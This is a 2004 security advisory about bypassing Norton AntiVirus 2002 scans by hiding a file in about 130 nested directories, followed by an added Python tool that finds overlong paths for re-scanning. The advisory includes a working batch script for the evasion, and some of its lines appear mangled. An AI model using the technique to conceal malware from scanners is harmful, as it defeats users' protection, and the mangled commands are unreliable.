Securityvulns SECURITYVULNS:DOC:6098
Apr 19, 2004 - 12:00 a.m.

Norton AntiVirus nested file manual scan bypass.....


Product Version: Norton Antivirus 2002 (~Only tested On…~)
Risk Impact: Medium
Vendor Status: No response!

Summary:

If you manage to inject a file into a sub-directory nested deeper than the Windows OS can normally create [say in the 130th or deeper sub-directory, at c:\…\…\…\… up to the 130th], NAV fails to scan the NESTED FILE. Indeed, it is more a Windows restriction on accessing the nested file than an ANTIVIRUS flaw. Other antivirus products should suffer from the same problem. PLEASE VERIFY.

=-------CUT----------=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo »
echo ************************************************
echo -( For a harmless test… you can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cd\
c:
cd\
rem Keep creating and entering one-character directories until it fails
:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
cd…
rmdir 1
md X
cls
echo ***************************************************************
echo Now you can inject any file inside the folder 'X' which is inside
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\…\…\…[120'th dir]…\X\ ]

echo Note: The file you are moving to 'c:\1\…\X\' should only contain
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc…
echo not as '123.not' 'qwert.hak'
echo …
echo So, ARE YOU DONE!?
echo …
echo After this batch script is terminated, you'll
echo find the file you ^just copied^ inside c:\1\…\X\
echo now in c:\3\3\3\3\3\1\1\1\…[130' th dir]…\X\
echo mmm… Then have a manual scan of c:\3\ Any file you
echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!!
echo ***************************************************

pause
rem Copy the whole c:\1 tree underneath ten further directory levels
cd\
md 3\3\3\3\3\3\3\3\3\3
cd\
xcopy /E /I c:\1\. c:3\3\3\3\3\3\3\3\3\3
exit

=-------CUT----------=
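
The Summary attributes the missed file to a Windows restriction on accessing deeply nested paths. The following is an added example, not part of the original advisory: a Python inventory of files whose full path reaches the classic Win32 `MAX_PATH` of 260 characters, which is assumed here to be the restriction meant. The function names and the sample tree are constructed for illustration.

```python
import os
import shutil
import sys
import tempfile

LEGACY_MAX_PATH = 260   # classic Win32 MAX_PATH (assumed limit, not named in the advisory)
PREFIX = "\\\\?\\"      # Windows extended-length prefix, lifts the limit for our own walk


def extended(path):
    """Absolute path, with the extended-length prefix added on Windows."""
    path = os.path.abspath(path)
    if sys.platform == "win32" and not path.startswith(PREFIX):
        return PREFIX + path
    return path


def plain_len(path):
    """Path length as a legacy (non-prefixed) API caller would see it."""
    return len(path[len(PREFIX):] if path.startswith(PREFIX) else path)


def find_overlong_files(root, limit=LEGACY_MAX_PATH):
    """Return sorted (length, path): files at or past the limit, plus unreadable dirs."""
    hits, stack = [], [extended(root)]
    while stack:  # explicit stack: a 130-level tree must not depend on recursion depth
        current = stack.pop()
        try:
            entries = list(os.scandir(current))
        except OSError:
            hits.append((plain_len(current), current))
            continue
        for entry in entries:
            if entry.is_dir(follow_symlinks=False):
                stack.append(entry.path)
            elif plain_len(entry.path) >= limit:
                hits.append((plain_len(entry.path), entry.path))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample tree in a temp dir: 130 one-character directories, X, a.exe.
    base = extended(tempfile.mkdtemp())
    deep = os.path.join(base, *["1"] * 130, "X")
    os.makedirs(deep)
    open(os.path.join(deep, "a.exe"), "w").close()
    for length, path in find_overlong_files(base):
        print(length, path[:30] + "..." + path[-8:])
    shutil.rmtree(base)
```

Files reported here are the ones to re-check with a scanner that is known to handle extended-length paths, or to move to a shorter path before scanning.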

Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on this information.

